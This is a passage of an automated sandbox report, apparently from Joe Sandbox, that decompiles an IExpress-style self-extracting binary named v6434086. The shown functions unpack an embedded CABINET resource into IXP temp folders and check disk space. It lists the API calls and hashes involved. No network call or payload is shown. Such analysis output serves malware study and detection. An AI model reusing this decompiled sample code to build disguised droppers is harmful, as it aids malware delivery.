                                                                                                                                                                                                        							if(( *0xbc9a34 & 0x00000008) == 0) {
                                                                                                                                                                                                        								L20:
                                                                                                                                                                                                        								_t103 =  *0xbc9a38; // 0x0
                                                                                                                                                                                                        								_t110 =  *((intOrPtr*)(0xbc89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                        								L21:
                                                                                                                                                                                                        								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                        								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                        									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                        									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                        										__eflags = _t103 - _t116;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags = _t110 - _t116;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									 *0xbc9124 = 0;
                                                                                                                                                                                                        									_t66 = 1;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t66 = E00BC268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                        							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t105 =  *0xbc9a38; // 0x0
                                                                                                                                                                                                        							_t110 =  *((intOrPtr*)(0xbc89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xbc89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                        							_t103 = (_t105 >> 2) +  *0xbc9a38;
                                                                                                                                                                                                        							goto L21;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t110 = 0x4c5;
                                                                                                                                                                                                        						E00BC44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						goto L31;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        					 *0xbc9124 = E00BC6285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        					_t110 = 0x4f9;
                                                                                                                                                                                                        					goto L30;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t110 = 0x4bc;
                                                                                                                                                                                                        					E00BC44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0xbc9124 = E00BC6285();
                                                                                                                                                                                                        					_t66 = 0;
                                                                                                                                                                                                        					L33:
                                                                                                                                                                                                        					return E00BC6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}




































                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00BC59A8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 00BC59AF
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00BC5A13
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00BC5A40
                                                                                                                                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00BC5A64
                                                                                                                                                                                                        • memset.MSVCRT ref: 00BC5A7C
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00BC5A98
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00BC5AA5
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00BC5BFC
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                          • Part of subcall function 00BC6285: GetLastError.KERNEL32(00BC5BBC), ref: 00BC6285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4237285672-0
                                                                                                                                                                                                        • Opcode ID: 548b99771bf7991052ecc27732bacce4e8ac91beb27cca252114aac771798730
                                                                                                                                                                                                        • Instruction ID: 56f3da5d2495791e8e6881032edd7e8aab9009284eda94b6bd01743c63a42c2f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 548b99771bf7991052ecc27732bacce4e8ac91beb27cca252114aac771798730
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E715DB1A0060CABEB259F64CC89FEB77ECEB4C344F5441EDF54597140EA74AE858B60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 374 bc4fe0-bc501a call bc468f FindResourceA LoadResource LockResource 377 bc5020-bc5027 374->377 378 bc5161-bc5163 374->378 379 bc5029-bc5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 bc5057-bc505e call bc4efd 377->380 379->380 383 bc507c-bc50b4 380->383 384 bc5060-bc5077 call bc44b9 380->384 389 bc50e8-bc5104 call bc44b9 383->389 390 bc50b6-bc50da 383->390 388 bc5107-bc510e 384->388 392 bc511d-bc511f 388->392 393 bc5110-bc5117 FreeResource 388->393 402 bc5106 389->402 401 bc50dc 390->401 390->402 394 bc513a-bc5141 392->394 395 bc5121-bc5127 392->395 393->392 399 bc515f 394->399 400 bc5143-bc514a 394->400 395->394 398 bc5129-bc5135 call bc44b9 395->398 398->394 399->378 400->399 404 bc514c-bc5159 SendMessageA 400->404 405 bc50e3-bc50e6 401->405 402->388 404->399 405->389 405->402
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E00BC4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				struct HWND__* _t9;
                                                                                                                                                                                                        				int _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        				struct HWND__* _t27;
                                                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				CHAR* _t36;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t36 = "CABINET";
                                                                                                                                                                                                        				 *0xbc9144 = E00BC468F(_t36, 0, 0);
                                                                                                                                                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                        				 *0xbc9140 = _t8;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					return _t8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t9 =  *0xbc8584; // 0x0
                                                                                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                        					ShowWindow(GetDlgItem( *0xbc8584, 0x841), 5);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t10 = E00BC4EFD(0, 0);
                                                                                                                                                                                                        				if(_t10 != 0) {
                                                                                                                                                                                                        					__imp__#20(E00BC4CA0, E00BC4CC0, E00BC4980, E00BC4A50, E00BC4AD0, E00BC4B60, E00BC4BC0, 1, 0xbc9148, _t33);
                                                                                                                                                                                                        					_t34 = _t10;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						_t29 =  *0xbc9148; // 0x0
                                                                                                                                                                                                        						_t24 =  *0xbc8584; // 0x0
                                                                                                                                                                                                        						E00BC44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#22(_t34, "*MEMCAB", 0xbc1140, 0, E00BC4CD0, 0, 0xbc9140); // executed
                                                                                                                                                                                                        					_t37 = _t10;
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#23(_t34); // executed
                                                                                                                                                                                                        					if(_t10 != 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 =  *0xbc8584; // 0x0
                                                                                                                                                                                                        					E00BC44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_t12 =  *0xbc9140; // 0x0
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						FreeResource(_t12);
                                                                                                                                                                                                        						 *0xbc9140 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						_t47 =  *0xbc91d8; // 0x0
                                                                                                                                                                                                        						if(_t47 == 0) {
                                                                                                                                                                                                        							E00BC44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(( *0xbc8a38 & 0x00000001) == 0 && ( *0xbc9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                        						SendMessageA( *0xbc8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t37;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}
















                                                                                                                                                                                                        0x00bc5127
                                                                                                                                                                                                        0x00bc5141
                                                                                                                                                                                                        0x00bc5159
                                                                                                                                                                                                        0x00bc5159
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc515f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46A0
                                                                                                                                                                                                          • Part of subcall function 00BC468F: SizeofResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46A9
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46C3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LoadResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46CC
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LockResource.KERNEL32(00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46D3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: memcpy_s.MSVCRT ref: 00BC46E5
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46EF
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00BC4FFE
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00BC5006
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00BC500D
                                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 00BC5030
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00BC5037
                                                                                                                                                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 00BC504A
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00BC5051
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00BC5111
                                                                                                                                                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00BC5159
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                        • API String ID: 1305606123-2642027498
                                                                                                                                                                                                        • Opcode ID: 3febf5ca6895a3546adbf50ad5d178f692abd3ecb0dffaad76e96c7477718ad1
                                                                                                                                                                                                        • Instruction ID: 11914bdb3826713bb3595840f690ec2b970028f06626dc3efb3c91bb63fcd739
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3febf5ca6895a3546adbf50ad5d178f692abd3ecb0dffaad76e96c7477718ad1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF31A5B16407157FE7205B65AD9EF673AECE74CB99F0800ACF901B32A1DFB49C408665
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00BC53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				long _t13;
                                                                                                                                                                                                        				int _t14;
                                                                                                                                                                                                        				CHAR* _t20;
                                                                                                                                                                                                        				int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				CHAR* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                        				_t32 = __edx;
                                                                                                                                                                                                        				_t20 = __ecx;
                                                                                                                                                                                                        				_t29 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E00BC171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                        					_t34 = _t34 + 0x10;
                                                                                                                                                                                                        					_t29 = _t29 + 1;
                                                                                                                                                                                                        					E00BC1680(_t32, 0x104, _t20);
                                                                                                                                                                                                        					E00BC658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                        					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                        					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t29 < 0x190) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t30 = 0;
                                                                                                                                                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                        						_t30 = 1;
                                                                                                                                                                                                        						DeleteFileA(_t32);
                                                                                                                                                                                                        						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return E00BC6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t30 = 1;
                                                                                                                                                                                                        				 *0xbc8a20 = 1;
                                                                                                                                                                                                        				goto L5;
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC171E: _vsnprintf.MSVCRT ref: 00BC1750
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC53FB
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC5402
                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC541F
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC542B
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC5434
                                                                                                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC5452
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                        • API String ID: 1082909758-3361814588
                                                                                                                                                                                                        • Opcode ID: a363110bf87abc4f93638cfe5ba56e570b21730a9a45f31bfeed80270185e7ef
                                                                                                                                                                                                        • Instruction ID: 854f8535718fbdad2c4e5005214c75e2021f31f5f979543c144b1110884b86c1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a363110bf87abc4f93638cfe5ba56e570b21730a9a45f31bfeed80270185e7ef
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F11277130050877D3249B369C49FAF37ADEFCA315F0000ADF546D3291CE749D8286A5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 478 bc5467-bc5484 479 bc551c-bc5528 call bc1680 478->479 480 bc548a-bc5490 call bc53a1 478->480 484 bc552d-bc5539 call bc58c8 479->484 483 bc5495-bc5497 480->483 485 bc549d-bc54c0 call bc1781 483->485 486 bc5581-bc5583 483->486 493 bc554d-bc5552 484->493 494 bc553b-bc5545 CreateDirectoryA 484->494 499 bc550c-bc551a call bc658a 485->499 500 bc54c2-bc54d8 GetSystemInfo 485->500 489 bc558d-bc559d call bc6ce0 486->489 497 bc5554-bc5557 call bc597d 493->497 498 bc5585-bc558b 493->498 495 bc5577-bc557c call bc6285 494->495 496 bc5547 494->496 495->486 496->493 507 bc555c-bc555e 497->507 498->489 499->484 505 bc54fe 500->505 506 bc54da-bc54dd 500->506 508 bc5503-bc5507 call bc658a 505->508 511 bc54df-bc54e2 506->511 512 bc54f7-bc54fc 506->512 507->498 515 bc5560-bc5566 507->515 508->499 513 bc54e4-bc54e7 511->513 514 bc54f0-bc54f5 511->514 512->508 513->499 517 bc54e9-bc54ee 513->517 514->508 515->486 518 bc5568-bc5575 RemoveDirectoryA 515->518 517->508 518->486
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00BC5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR* _t48;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t10 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				if(__edx == 0) {
                                                                                                                                                                                                        					_t48 = 0xbc91e4;
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E00BC1680(0xbc91e4, 0x104);
                                                                                                                                                                                                        					L14:
                                                                                                                                                                                                        					_t13 = E00BC58C8(_t48); // executed
                                                                                                                                                                                                        					if(_t13 != 0) {
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						_t42 = _a4;
                                                                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							 *0xbc9124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        							L24:
                                                                                                                                                                                                        							return E00BC6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t16 = E00BC597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                        						if(_t16 != 0) {
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t61 =  *0xbc8a20; // 0x0
                                                                                                                                                                                                        						if(_t61 != 0) {
                                                                                                                                                                                                        							 *0xbc8a20 = 0;
                                                                                                                                                                                                        							RemoveDirectoryA(_t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L22:
                                                                                                                                                                                                        						_t14 = 0;
                                                                                                                                                                                                        						goto L24;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                        						 *0xbc9124 = E00BC6285();
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xbc8a20 = 1;
                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 =  &_v268;
                                                                                                                                                                                                        				_t20 = E00BC53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                        				if(_t20 == 0) {
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t48 = 0xbc91e4;
                                                                                                                                                                                                        				E00BC1781(0xbc91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                        				if(( *0xbc9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E00BC658A(_t48, 0x104, 0xbc1140);
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				GetSystemInfo( &_v304);
                                                                                                                                                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					_push("i386");
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					E00BC658A(_t48, 0x104);
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = _t26 - 1;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					_push("mips");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = _t28 - 1;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					_push("alpha");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t29 != 1) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push("ppc");
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}





















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC54C9
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC553D
                                                                                                                                                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC556F
                                                                                                                                                                                                          • Part of subcall function 00BC53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC53FB
                                                                                                                                                                                                          • Part of subcall function 00BC53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC5402
                                                                                                                                                                                                          • Part of subcall function 00BC53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC541F
                                                                                                                                                                                                          • Part of subcall function 00BC53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC542B
                                                                                                                                                                                                          • Part of subcall function 00BC53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC5434
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
